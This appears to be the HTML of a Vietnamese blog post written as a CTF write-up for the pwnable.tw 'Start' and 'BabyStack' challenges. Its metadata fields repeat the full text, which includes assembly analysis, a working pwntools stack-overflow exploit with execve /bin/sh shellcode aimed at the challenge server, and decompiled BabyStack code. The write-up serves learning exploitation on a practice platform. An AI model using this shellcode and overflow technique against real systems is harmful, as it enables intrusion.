<!DOCTYPE html>
<html>

  <head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title>Pwnable.tw</title>
  <meta name="description" content="Table of Content  0x00 Lời chào  0x01 Start  0x02 BabyStack0x00 Lời chàoKhoảng một tháng trở lại đây, tôi chuyên tâm hơn vào việc chơi pwn. Một phần là vì mả...">

  <link rel="stylesheet" href="/css/main.css">
  <link rel="canonical" href="http://localhost:4000/2023/06/23/Pwnable.tw.html">
  <link rel="alternate" type="application/rss+xml" title="Duc Dat Dau" href="http://localhost:4000/feed.xml">
  <!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Pwnable.tw | Duc Dat Dau</title>
<meta name="generator" content="Jekyll v4.3.2" />
<meta property="og:title" content="Pwnable.tw" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Table of Content 0x00 Lời chào 0x01 Start 0x02 BabyStack 0x00 Lời chào Khoảng một tháng trở lại đây, tôi chuyên tâm hơn vào việc chơi pwn. Một phần là vì mảng pwn khó, phần còn lại là tôi nghĩ nó có thể giúp tôi kiếm được tiền :)) Vì là một người mới, những kiến thức mà tôi viết ở đây có thể chưa chính xác hoàn toàn. Rất mong các bạn đọc góp ý để tôi phát triển hơn nữa. Pwnable.tw là một trang luyện tập mảng pwn khá nổi tiếng của Đài Loan. Theo tôi cảm nhận, thử thách ở đây khá khó cho người mới. Nếu các bạn không làm được thì cũng đừng lấy gì làm lạ. Tôi đã mất khoảng hơn 1 tuần để nghiền ngẫm challenge đầu tiên. 0x01 Start I. Tổng quan Đề bài cho chúng ta duy nhất một file là start. Việc đầu tiên tôi thường làm sẽ là kiểm tra xem file là 32 hay 64 bits. Để kiểm tra, tôi thường dùng file. $ file start start: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped Thông tin cho chúng ta biết được đây là một file 32 bits. Load chương trình vào IDAPRO x32, quan sát các hàm ở mục Functions, nhận thấy rằng chương trình chỉ xoay quanh hàm _start. Tiếp đến, tôi sẽ sử dụng checksec để kiểm tra các lớp bảo vệ của file. Tôi đoán sẽ có nhiều bạn không hiểu dùng checksec để làm gì. Ngày trước tôi cũng như vậy, nhưng sau một khoảng thời gian ngắn, tôi được tiếp cận thêm về lỗ bổng BOF - Buffer Overflow, tôi mới thấy nó vô cũng hữu hiệu. $ checksec --file=&quot;start&quot; RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE No RELRO No canary found NX disabled No PIE No RPATH No RUNPATH 8) Symbols No 0 0 start Đối với bài toán này, để đơn giản, các bạn chỉ cần quan tâm tới thông số NX: Disabled. Nghĩa là các bạn có thể chèn mã thực thi lên stack. Nếu NX: Enabled, cho dù mã thực thi được chèn lên stack thì nó vẫn sẽ không hoạt động. II. Phân tích push esp push offset _exit xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx push 3A465443h push 20656874h push 20747261h push 74732073h push 2774654Ch mov ecx, esp ; addr mov dl, 14h ; len mov bl, 1 ; fd mov al, 4 int 80h ; LINUX - sys_write xor ebx, ebx mov dl, 3Ch ; &#39;&lt;&#39; mov al, 3 int 80h ; LINUX - add esp, 14h retn Mã assembly của hàm _start rất dễ đọc, chúng ta sẽ đi phân tích nội dung từng đoạn code. Việc đầu tiên là đẩy thanh ghi ESP và offset của hàm _exit vào trong stack. Sau đó, gán giá trị của 4 thanh ghi EAX, EBX, ECX, EDX = 0. Tiếp theo là đẩy các giá trị 3A465443h, 20656874h, 20747261h, 74732073h, 2774654Ch vào trong stack. Câu hỏi đặt ra ở đây là 5 con số trên là gì vậy? Rất đơn giản, nó chính là: 3A465443h = “:FTC” 20656874h = “ eht” 20747261h = “ tra” 74732073h = “ts s” 2774654Ch = “‘teL” Chúng đại diện cho chuỗi “Let’s start the CTF:” Đoạn mã tiếp theo, chương trình gọi ra 2 system call là sys_write và sys_read mov ecx, esp ; addr mov dl, 14h ; len mov bl, 1 ; fd mov al, 4 int 80h ; LINUX - sys_write Thông tin của sys_write: Xuất ra màn hình chuỗi từ địa chỉ ESP hiện tại Số byte: 0x14 bytes File descriptor: stdout xor ebx, ebx mov dl, 3Ch ; &#39;&lt;&#39; mov al, 3 int 80h ; LINUX - sys_read Thông tin của sys_read Đọc một chuỗi từ bộ nhập chuẩn Số byte: 0x3C Đoạn mã cuối cùng tăng giá trị thanh ghi ESP lên 0x14 đơn vị. retn gọi địa chỉ thanh ghi ESP đang giữ rồi cộng ESP lên 4 đơn vị. add esp, 14h retn III. Lỗ hổng Chúng ta cùng nhìn qua cấu trúc của stack trước khi gọi 2 system call. Giá trị của thanh ghi ESP ở: Hiện tại: 0xFFFFD124 Ban đầu: 0xFFFFD140 Chú ý rằng, thường các challenge sẽ bật Address Space Layout Randomization nên giá trị thanh ghi ESP ban đầu luôn có giá trị ngẫu nhiên. (Đây là lý do vì sao mình không lấy ESP = 0xFFFFD140 để khai thác lỗ hổng) Như ta đã phân tích ở trên, sys_read cho phép đọc 60 bytes vào stack. Nếu chúng đã nhập vào 20 bytes, thì từ địa chỉ 0xFFFFD124 đến 0xFFFFD134 sẽ được fill đủ. Giả sử chúng ta tiếp tục nhập vào, các giá trị tại các địa chỉ trên nó sẽ bị thay đổi. Dẫn tới lỗ hổng BOF. IV. Hướng tấn công Công việc chúng ta cần thực hiện: Lấy được địa chỉ thanh ghi ESP ban đầu. Từ việc có được giá trị thanh ghi ESP ban đầu, chúng ta sẽ đưa địa chỉ trả về của hàm là địa chỉ của shellcode. Công việc 1 Để lấy giá trị của thanh ghi ESP ban đầu rất đơn giản. Chúng ta nhập đủ 20 bytes để lấp đầy địa chỉ từ 0xFFFFD124 đến 0xFFFFD134, tiếp tục ghi thêm 4 bytes 0x08048087 để chương trình có thể gọi system call read và write lần thứ 2. Bây giờ, giá trị của thanh ghi ESP sẽ là: 0xFFFFD124 + 0x14 + 0x4 = 0xFFFFD13C. Chú ý, đây cũng là nơi chứa giá trị thanh ghi ESP ban đầu. Lợi dụng việc gọi sys_write lần thứ 2. Chỉ cần in ra 4 bytes đầu tiên, chúng ta sẽ lấy được địa chỉ ESP ban đầu. payload1 = b&#39;x&#39; * 0x14 + p32(0x08048087) r.sendafter(b&#39;:&#39;, payload1) esp_leaked = u32(r.recv()[:4]) Công việc 2 Sau khi đã có địa chỉ ESP ban đầu. Việc của chúng ta là phải tính toán xem phải input bao nhiêu ký tự để chương trình có thể thực thi được shellcode. Gọi địa chỉ ESP ban đầu là ESP = X, giá trị hiện tại ESP = X - 4 Sau khi sys_read được gọi, ESP + 0x14, nghĩa là ESP đứng ở X + 16. Ở X + 16, chúng ta chỉ cần gán cho nó giá trị là X + 20, nơi shellcode được viết. Hàm trả về sẽ là địa chỉ shellcode được bắt đầu. payload2 = b&#39;x&#39; * 0x14 + p32(leaked_esp + 0x14) + shellcode V. Mã khai thác from pwn import * r = remote(&quot;chall.pwnable.tw&quot;, 10000) shellcode = b&quot;\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80&quot; payload1 = b&#39;x&#39; * 0x14 + p32(0x08048087) r.sendafter(b&#39;:&#39;, payload1) esp_leaked = u32(r.recv()[:4]) payload2 = b&#39;x&#39; * 0x14 + p32(esp_leaked + 0x14) + shellcode r.send(payload2) r.interactive() VI. Tham khảo Pwnable.tw - Start @y198 Pwnable.tw - Start @c01dkit 0x02 BabyStack Sau khi decompile và rename các biến, chúng ta thu được mã giả như sau __int64 __fastcall main(__int64 a1, char **a2, char **a3) { _QWORD *v3; // rcx __int64 v4; // rdx char buf[64]; // [rsp+0h] [rbp-60h] BYREF __int64 random_password[2]; // [rsp+40h] [rbp-20h] BYREF char option[16]; // [rsp+50h] [rbp-10h] BYREF mmap_canary(); random_fd = open(&quot;/dev/urandom&quot;, 0); read(random_fd, random_password, 0x10uLL); v3 = canary; v4 = random_password[1]; *(_QWORD *)canary = random_password[0]; v3[1] = v4; close(random_fd); while ( 1 ) { write(1, &quot;&gt;&gt; &quot;, 3uLL); read_(0LL, option, 0x10LL, 0x10LL); if ( option[0] == &#39;2&#39; ) // exit() { break; } if ( option[0] == &#39;3&#39; ) { if ( status_login ) { copy_input(buf); } else { LABEL_x1040: puts(&quot;Invalid choice&quot;); } } else { if ( option[0] != &#39;1&#39; ) { goto LABEL_x1040; } if ( status_login ) { status_login = 0; } else { login((const char *)random_password); } } } if ( !status_login ) { exit(0); } memcmp(random_password, canary, 0x10uLL); return 0LL; }" />
<meta property="og:description" content="Table of Content 0x00 Lời chào 0x01 Start 0x02 BabyStack 0x00 Lời chào Khoảng một tháng trở lại đây, tôi chuyên tâm hơn vào việc chơi pwn. Một phần là vì mảng pwn khó, phần còn lại là tôi nghĩ nó có thể giúp tôi kiếm được tiền :)) Vì là một người mới, những kiến thức mà tôi viết ở đây có thể chưa chính xác hoàn toàn. Rất mong các bạn đọc góp ý để tôi phát triển hơn nữa. Pwnable.tw là một trang luyện tập mảng pwn khá nổi tiếng của Đài Loan. Theo tôi cảm nhận, thử thách ở đây khá khó cho người mới. Nếu các bạn không làm được thì cũng đừng lấy gì làm lạ. Tôi đã mất khoảng hơn 1 tuần để nghiền ngẫm challenge đầu tiên. 0x01 Start I. Tổng quan Đề bài cho chúng ta duy nhất một file là start. Việc đầu tiên tôi thường làm sẽ là kiểm tra xem file là 32 hay 64 bits. Để kiểm tra, tôi thường dùng file. $ file start start: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped Thông tin cho chúng ta biết được đây là một file 32 bits. Load chương trình vào IDAPRO x32, quan sát các hàm ở mục Functions, nhận thấy rằng chương trình chỉ xoay quanh hàm _start. Tiếp đến, tôi sẽ sử dụng checksec để kiểm tra các lớp bảo vệ của file. Tôi đoán sẽ có nhiều bạn không hiểu dùng checksec để làm gì. Ngày trước tôi cũng như vậy, nhưng sau một khoảng thời gian ngắn, tôi được tiếp cận thêm về lỗ bổng BOF - Buffer Overflow, tôi mới thấy nó vô cũng hữu hiệu. $ checksec --file=&quot;start&quot; RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE No RELRO No canary found NX disabled No PIE No RPATH No RUNPATH 8) Symbols No 0 0 start Đối với bài toán này, để đơn giản, các bạn chỉ cần quan tâm tới thông số NX: Disabled. Nghĩa là các bạn có thể chèn mã thực thi lên stack. Nếu NX: Enabled, cho dù mã thực thi được chèn lên stack thì nó vẫn sẽ không hoạt động. II. Phân tích push esp push offset _exit xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx push 3A465443h push 20656874h push 20747261h push 74732073h push 2774654Ch mov ecx, esp ; addr mov dl, 14h ; len mov bl, 1 ; fd mov al, 4 int 80h ; LINUX - sys_write xor ebx, ebx mov dl, 3Ch ; &#39;&lt;&#39; mov al, 3 int 80h ; LINUX - add esp, 14h retn Mã assembly của hàm _start rất dễ đọc, chúng ta sẽ đi phân tích nội dung từng đoạn code. Việc đầu tiên là đẩy thanh ghi ESP và offset của hàm _exit vào trong stack. Sau đó, gán giá trị của 4 thanh ghi EAX, EBX, ECX, EDX = 0. Tiếp theo là đẩy các giá trị 3A465443h, 20656874h, 20747261h, 74732073h, 2774654Ch vào trong stack. Câu hỏi đặt ra ở đây là 5 con số trên là gì vậy? Rất đơn giản, nó chính là: 3A465443h = “:FTC” 20656874h = “ eht” 20747261h = “ tra” 74732073h = “ts s” 2774654Ch = “‘teL” Chúng đại diện cho chuỗi “Let’s start the CTF:” Đoạn mã tiếp theo, chương trình gọi ra 2 system call là sys_write và sys_read mov ecx, esp ; addr mov dl, 14h ; len mov bl, 1 ; fd mov al, 4 int 80h ; LINUX - sys_write Thông tin của sys_write: Xuất ra màn hình chuỗi từ địa chỉ ESP hiện tại Số byte: 0x14 bytes File descriptor: stdout xor ebx, ebx mov dl, 3Ch ; &#39;&lt;&#39; mov al, 3 int 80h ; LINUX - sys_read Thông tin của sys_read Đọc một chuỗi từ bộ nhập chuẩn Số byte: 0x3C Đoạn mã cuối cùng tăng giá trị thanh ghi ESP lên 0x14 đơn vị. retn gọi địa chỉ thanh ghi ESP đang giữ rồi cộng ESP lên 4 đơn vị. add esp, 14h retn III. Lỗ hổng Chúng ta cùng nhìn qua cấu trúc của stack trước khi gọi 2 system call. Giá trị của thanh ghi ESP ở: Hiện tại: 0xFFFFD124 Ban đầu: 0xFFFFD140 Chú ý rằng, thường các challenge sẽ bật Address Space Layout Randomization nên giá trị thanh ghi ESP ban đầu luôn có giá trị ngẫu nhiên. (Đây là lý do vì sao mình không lấy ESP = 0xFFFFD140 để khai thác lỗ hổng) Như ta đã phân tích ở trên, sys_read cho phép đọc 60 bytes vào stack. Nếu chúng đã nhập vào 20 bytes, thì từ địa chỉ 0xFFFFD124 đến 0xFFFFD134 sẽ được fill đủ. Giả sử chúng ta tiếp tục nhập vào, các giá trị tại các địa chỉ trên nó sẽ bị thay đổi. Dẫn tới lỗ hổng BOF. IV. Hướng tấn công Công việc chúng ta cần thực hiện: Lấy được địa chỉ thanh ghi ESP ban đầu. Từ việc có được giá trị thanh ghi ESP ban đầu, chúng ta sẽ đưa địa chỉ trả về của hàm là địa chỉ của shellcode. Công việc 1 Để lấy giá trị của thanh ghi ESP ban đầu rất đơn giản. Chúng ta nhập đủ 20 bytes để lấp đầy địa chỉ từ 0xFFFFD124 đến 0xFFFFD134, tiếp tục ghi thêm 4 bytes 0x08048087 để chương trình có thể gọi system call read và write lần thứ 2. Bây giờ, giá trị của thanh ghi ESP sẽ là: 0xFFFFD124 + 0x14 + 0x4 = 0xFFFFD13C. Chú ý, đây cũng là nơi chứa giá trị thanh ghi ESP ban đầu. Lợi dụng việc gọi sys_write lần thứ 2. Chỉ cần in ra 4 bytes đầu tiên, chúng ta sẽ lấy được địa chỉ ESP ban đầu. payload1 = b&#39;x&#39; * 0x14 + p32(0x08048087) r.sendafter(b&#39;:&#39;, payload1) esp_leaked = u32(r.recv()[:4]) Công việc 2 Sau khi đã có địa chỉ ESP ban đầu. Việc của chúng ta là phải tính toán xem phải input bao nhiêu ký tự để chương trình có thể thực thi được shellcode. Gọi địa chỉ ESP ban đầu là ESP = X, giá trị hiện tại ESP = X - 4 Sau khi sys_read được gọi, ESP + 0x14, nghĩa là ESP đứng ở X + 16. Ở X + 16, chúng ta chỉ cần gán cho nó giá trị là X + 20, nơi shellcode được viết. Hàm trả về sẽ là địa chỉ shellcode được bắt đầu. payload2 = b&#39;x&#39; * 0x14 + p32(leaked_esp + 0x14) + shellcode V. Mã khai thác from pwn import * r = remote(&quot;chall.pwnable.tw&quot;, 10000) shellcode = b&quot;\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80&quot; payload1 = b&#39;x&#39; * 0x14 + p32(0x08048087) r.sendafter(b&#39;:&#39;, payload1) esp_leaked = u32(r.recv()[:4]) payload2 = b&#39;x&#39; * 0x14 + p32(esp_leaked + 0x14) + shellcode r.send(payload2) r.interactive() VI. Tham khảo Pwnable.tw - Start @y198 Pwnable.tw - Start @c01dkit 0x02 BabyStack Sau khi decompile và rename các biến, chúng ta thu được mã giả như sau __int64 __fastcall main(__int64 a1, char **a2, char **a3) { _QWORD *v3; // rcx __int64 v4; // rdx char buf[64]; // [rsp+0h] [rbp-60h] BYREF __int64 random_password[2]; // [rsp+40h] [rbp-20h] BYREF char option[16]; // [rsp+50h] [rbp-10h] BYREF mmap_canary(); random_fd = open(&quot;/dev/urandom&quot;, 0); read(random_fd, random_password, 0x10uLL); v3 = canary; v4 = random_password[1]; *(_QWORD *)canary = random_password[0]; v3[1] = v4; close(random_fd); while ( 1 ) { write(1, &quot;&gt;&gt; &quot;, 3uLL); read_(0LL, option, 0x10LL, 0x10LL); if ( option[0] == &#39;2&#39; ) // exit() { break; } if ( option[0] == &#39;3&#39; ) { if ( status_login ) { copy_input(buf); } else { LABEL_x1040: puts(&quot;Invalid choice&quot;); } } else { if ( option[0] != &#39;1&#39; ) { goto LABEL_x1040; } if ( status_login ) { status_login = 0; } else { login((const char *)random_password); } } } if ( !status_login ) { exit(0); } memcmp(random_password, canary, 0x10uLL); return 0LL; }" />
<link rel="canonical" href="http://localhost:4000/2023/06/23/Pwnable.tw.html" />
<meta property="og:url" content="http://localhost:4000/2023/06/23/Pwnable.tw.html" />
<meta property="og:site_name" content="Duc Dat Dau" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-06-23T00:00:00+07:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Pwnable.tw" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2023-06-23T00:00:00+07:00","datePublished":"2023-06-23T00:00:00+07:00","description":"Table of Content 0x00 Lời chào 0x01 Start 0x02 BabyStack 0x00 Lời chào Khoảng một tháng trở lại đây, tôi chuyên tâm hơn vào việc chơi pwn. Một phần là vì mảng pwn khó, phần còn lại là tôi nghĩ nó có thể giúp tôi kiếm được tiền :)) Vì là một người mới, những kiến thức mà tôi viết ở đây có thể chưa chính xác hoàn toàn. Rất mong các bạn đọc góp ý để tôi phát triển hơn nữa. Pwnable.tw là một trang luyện tập mảng pwn khá nổi tiếng của Đài Loan. Theo tôi cảm nhận, thử thách ở đây khá khó cho người mới. Nếu các bạn không làm được thì cũng đừng lấy gì làm lạ. Tôi đã mất khoảng hơn 1 tuần để nghiền ngẫm challenge đầu tiên. 0x01 Start I. Tổng quan Đề bài cho chúng ta duy nhất một file là start. Việc đầu tiên tôi thường làm sẽ là kiểm tra xem file là 32 hay 64 bits. Để kiểm tra, tôi thường dùng file. $ file start start: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped Thông tin cho chúng ta biết được đây là một file 32 bits. Load chương trình vào IDAPRO x32, quan sát các hàm ở mục Functions, nhận thấy rằng chương trình chỉ xoay quanh hàm _start. Tiếp đến, tôi sẽ sử dụng checksec để kiểm tra các lớp bảo vệ của file. Tôi đoán sẽ có nhiều bạn không hiểu dùng checksec để làm gì. Ngày trước tôi cũng như vậy, nhưng sau một khoảng thời gian ngắn, tôi được tiếp cận thêm về lỗ bổng BOF - Buffer Overflow, tôi mới thấy nó vô cũng hữu hiệu. $ checksec --file=&quot;start&quot; RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE No RELRO No canary found NX disabled No PIE No RPATH No RUNPATH 8) Symbols No 0 0 start Đối với bài toán này, để đơn giản, các bạn chỉ cần quan tâm tới thông số NX: Disabled. Nghĩa là các bạn có thể chèn mã thực thi lên stack. Nếu NX: Enabled, cho dù mã thực thi được chèn lên stack thì nó vẫn sẽ không hoạt động. II. Phân tích push esp push offset _exit xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx push 3A465443h push 20656874h push 20747261h push 74732073h push 2774654Ch mov ecx, esp ; addr mov dl, 14h ; len mov bl, 1 ; fd mov al, 4 int 80h ; LINUX - sys_write xor ebx, ebx mov dl, 3Ch ; &#39;&lt;&#39; mov al, 3 int 80h ; LINUX - add esp, 14h retn Mã assembly của hàm _start rất dễ đọc, chúng ta sẽ đi phân tích nội dung từng đoạn code. Việc đầu tiên là đẩy thanh ghi ESP và offset của hàm _exit vào trong stack. Sau đó, gán giá trị của 4 thanh ghi EAX, EBX, ECX, EDX = 0. Tiếp theo là đẩy các giá trị 3A465443h, 20656874h, 20747261h, 74732073h, 2774654Ch vào trong stack. Câu hỏi đặt ra ở đây là 5 con số trên là gì vậy? Rất đơn giản, nó chính là: 3A465443h = “:FTC” 20656874h = “ eht” 20747261h = “ tra” 74732073h = “ts s” 2774654Ch = “‘teL” Chúng đại diện cho chuỗi “Let’s start the CTF:” Đoạn mã tiếp theo, chương trình gọi ra 2 system call là sys_write và sys_read mov ecx, esp ; addr mov dl, 14h ; len mov bl, 1 ; fd mov al, 4 int 80h ; LINUX - sys_write Thông tin của sys_write: Xuất ra màn hình chuỗi từ địa chỉ ESP hiện tại Số byte: 0x14 bytes File descriptor: stdout xor ebx, ebx mov dl, 3Ch ; &#39;&lt;&#39; mov al, 3 int 80h ; LINUX - sys_read Thông tin của sys_read Đọc một chuỗi từ bộ nhập chuẩn Số byte: 0x3C Đoạn mã cuối cùng tăng giá trị thanh ghi ESP lên 0x14 đơn vị. retn gọi địa chỉ thanh ghi ESP đang giữ rồi cộng ESP lên 4 đơn vị. add esp, 14h retn III. Lỗ hổng Chúng ta cùng nhìn qua cấu trúc của stack trước khi gọi 2 system call. Giá trị của thanh ghi ESP ở: Hiện tại: 0xFFFFD124 Ban đầu: 0xFFFFD140 Chú ý rằng, thường các challenge sẽ bật Address Space Layout Randomization nên giá trị thanh ghi ESP ban đầu luôn có giá trị ngẫu nhiên. (Đây là lý do vì sao mình không lấy ESP = 0xFFFFD140 để khai thác lỗ hổng) Như ta đã phân tích ở trên, sys_read cho phép đọc 60 bytes vào stack. Nếu chúng đã nhập vào 20 bytes, thì từ địa chỉ 0xFFFFD124 đến 0xFFFFD134 sẽ được fill đủ. Giả sử chúng ta tiếp tục nhập vào, các giá trị tại các địa chỉ trên nó sẽ bị thay đổi. Dẫn tới lỗ hổng BOF. IV. Hướng tấn công Công việc chúng ta cần thực hiện: Lấy được địa chỉ thanh ghi ESP ban đầu. Từ việc có được giá trị thanh ghi ESP ban đầu, chúng ta sẽ đưa địa chỉ trả về của hàm là địa chỉ của shellcode. Công việc 1 Để lấy giá trị của thanh ghi ESP ban đầu rất đơn giản. Chúng ta nhập đủ 20 bytes để lấp đầy địa chỉ từ 0xFFFFD124 đến 0xFFFFD134, tiếp tục ghi thêm 4 bytes 0x08048087 để chương trình có thể gọi system call read và write lần thứ 2. Bây giờ, giá trị của thanh ghi ESP sẽ là: 0xFFFFD124 + 0x14 + 0x4 = 0xFFFFD13C. Chú ý, đây cũng là nơi chứa giá trị thanh ghi ESP ban đầu. Lợi dụng việc gọi sys_write lần thứ 2. Chỉ cần in ra 4 bytes đầu tiên, chúng ta sẽ lấy được địa chỉ ESP ban đầu. payload1 = b&#39;x&#39; * 0x14 + p32(0x08048087) r.sendafter(b&#39;:&#39;, payload1) esp_leaked = u32(r.recv()[:4]) Công việc 2 Sau khi đã có địa chỉ ESP ban đầu. Việc của chúng ta là phải tính toán xem phải input bao nhiêu ký tự để chương trình có thể thực thi được shellcode. Gọi địa chỉ ESP ban đầu là ESP = X, giá trị hiện tại ESP = X - 4 Sau khi sys_read được gọi, ESP + 0x14, nghĩa là ESP đứng ở X + 16. Ở X + 16, chúng ta chỉ cần gán cho nó giá trị là X + 20, nơi shellcode được viết. Hàm trả về sẽ là địa chỉ shellcode được bắt đầu. payload2 = b&#39;x&#39; * 0x14 + p32(leaked_esp + 0x14) + shellcode V. Mã khai thác from pwn import * r = remote(&quot;chall.pwnable.tw&quot;, 10000) shellcode = b&quot;\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80&quot; payload1 = b&#39;x&#39; * 0x14 + p32(0x08048087) r.sendafter(b&#39;:&#39;, payload1) esp_leaked = u32(r.recv()[:4]) payload2 = b&#39;x&#39; * 0x14 + p32(esp_leaked + 0x14) + shellcode r.send(payload2) r.interactive() VI. Tham khảo Pwnable.tw - Start @y198 Pwnable.tw - Start @c01dkit 0x02 BabyStack Sau khi decompile và rename các biến, chúng ta thu được mã giả như sau __int64 __fastcall main(__int64 a1, char **a2, char **a3) { _QWORD *v3; // rcx __int64 v4; // rdx char buf[64]; // [rsp+0h] [rbp-60h] BYREF __int64 random_password[2]; // [rsp+40h] [rbp-20h] BYREF char option[16]; // [rsp+50h] [rbp-10h] BYREF mmap_canary(); random_fd = open(&quot;/dev/urandom&quot;, 0); read(random_fd, random_password, 0x10uLL); v3 = canary; v4 = random_password[1]; *(_QWORD *)canary = random_password[0]; v3[1] = v4; close(random_fd); while ( 1 ) { write(1, &quot;&gt;&gt; &quot;, 3uLL); read_(0LL, option, 0x10LL, 0x10LL); if ( option[0] == &#39;2&#39; ) // exit() { break; } if ( option[0] == &#39;3&#39; ) { if ( status_login ) { copy_input(buf); } else { LABEL_x1040: puts(&quot;Invalid choice&quot;); } } else { if ( option[0] != &#39;1&#39; ) { goto LABEL_x1040; } if ( status_login ) { status_login = 0; } else { login((const char *)random_password); } } } if ( !status_login ) { exit(0); } memcmp(random_password, canary, 0x10uLL); return 0LL; }","headline":"Pwnable.tw","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2023/06/23/Pwnable.tw.html"},"url":"http://localhost:4000/2023/06/23/Pwnable.tw.html"}</script>
<!-- End Jekyll SEO tag -->

  
</head>


  <body>

    <header class="site-header">

  <div class="wrapper">

    <a class="site-title" href="/">Duc Dat Dau</a>

    <nav class="site-nav">
      <a href="#" class="menu-icon">
        <svg viewBox="0 0 18 15">
          <path fill="#424242" d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.031C17.335,0,18,0.665,18,1.484L18,1.484z"/>
          <path fill="#424242" d="M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0c0-0.82,0.665-1.484,1.484-1.484 h15.031C17.335,6.031,18,6.696,18,7.516L18,7.516z"/>
          <path fill="#424242" d="M18,13.516C18,14.335,17.335,15,16.516,15H1.484C0.665,15,0,14.335,0,13.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.031C17.335,12.031,18,12.696,18,13.516L18,13.516z"/>
        </svg>
      </a>
      <div class="trigger">
        
        
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
              <a class="page-link" href="/write/">Blog</a>
            
          
            
          
        
          
            
          
            
          
            
              <a class="page-link" href="/list100/">List 100</a>
            
          
            
          
            
          
            
          
            
          
            
          
            
          
        
          
            
          
            
          
            
          
            
          
            
          
            
              <a class="page-link" href="/public.html">Public</a>
            
          
            
          
            
          
            
          
        
          
            
          
            
          
            
          
            
          
            
          
            
          
            
              <a class="page-link" href="/research/">Research</a>
            
          
            
          
            
          
        
          
            
          
            
          
            
          
            
          
            
              <a class="page-link" href="/post/">CTF Writeup</a>
            
          
            
          
            
          
            
          
            
          
        
      </div>
    </nav>

  </div>

</header>


    <div class="page-content">
      <div class="wrapper">
        <script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    tex2jax: {
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
      inlineMath: [['$','$']], 
    }
  });
</script>

<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>

<script>
  /**
  *  RECOMMENDED CONFIGURATION VARIABLES: EDIT AND UNCOMMENT THE SECTION BELOW TO INSERT DYNAMIC VALUES FROM YOUR PLATFORM OR CMS.
  *  LEARN WHY DEFINING THESE VARIABLES IS IMPORTANT: https://disqus.com/admin/universalcode/#configuration-variables    */
  
  var disqus_config = function () {
  this.page.url = page.url ;  // Replace PAGE_URL with your page's canonical URL variable
  this.page.identifier = PAGE_IDENTIFIER; // Replace PAGE_IDENTIFIER with your page's unique identifier variable
  };
  
  (function() { // DON'T EDIT BELOW THIS LINE
  var d = document, s = d.createElement('script');
  s.src = 'https://https-geordo-github-io.disqus.com/embed.js';
  s.setAttribute('data-timestamp', +new Date());
  (d.head || d.body).appendChild(s);
  })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>

<article class="post" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title" itemprop="name headline">Pwnable.tw</h1>
    <p class="post-meta"><time datetime="2023-06-23T00:00:00+07:00" itemprop="datePublished">Jun 23, 2023</time></p>
  </header>

  <div class="post-content" itemprop="articleBody">
    <h2 id="table-of-content">
  
  
    Table of Content <a href="#table-of-content">#</a>
  
  
</h2>
    
<ul>
  <li><a href="#0x00-lời-chào">0x00 Lời chào</a></li>
  <li><a href="#0x01-start">0x01 Start</a></li>
  <li><a href="#0x02-babystack">0x02 BabyStack</a></li>
</ul>
<h2 id="0x00-lời-chào">
  
  
    0x00 Lời chào <a href="#0x00-lời-chào">#</a>
  
  
</h2>
    
<p>Khoảng một tháng trở lại đây, tôi chuyên tâm hơn vào việc chơi pwn. Một phần là vì mảng pwn khó, phần còn lại là tôi nghĩ nó có thể giúp tôi kiếm được tiền :)) Vì là một người mới, những kiến thức mà tôi viết ở đây có thể chưa chính xác hoàn toàn. Rất mong các bạn đọc góp ý để tôi phát triển hơn nữa.</p>

<p><a href="https://pwnable.tw/">Pwnable.tw</a> là một trang luyện tập mảng pwn khá nổi tiếng của Đài Loan. Theo tôi cảm nhận, thử thách ở đây khá khó cho người mới. Nếu các bạn không làm được thì cũng đừng lấy gì làm lạ. Tôi đã mất khoảng hơn 1 tuần để nghiền ngẫm challenge đầu tiên.</p>
<h2 id="0x01-start">
  
  
    0x01 Start <a href="#0x01-start">#</a>
  
  
</h2>
    
<h3 id="i-tổng-quan">
  
  
    I. Tổng quan <a href="#i-tổng-quan">#</a>
  
  
</h3>
    
<p><img src="/images/Pwnable.tw/0x01%20Start/start.png" alt="" /></p>

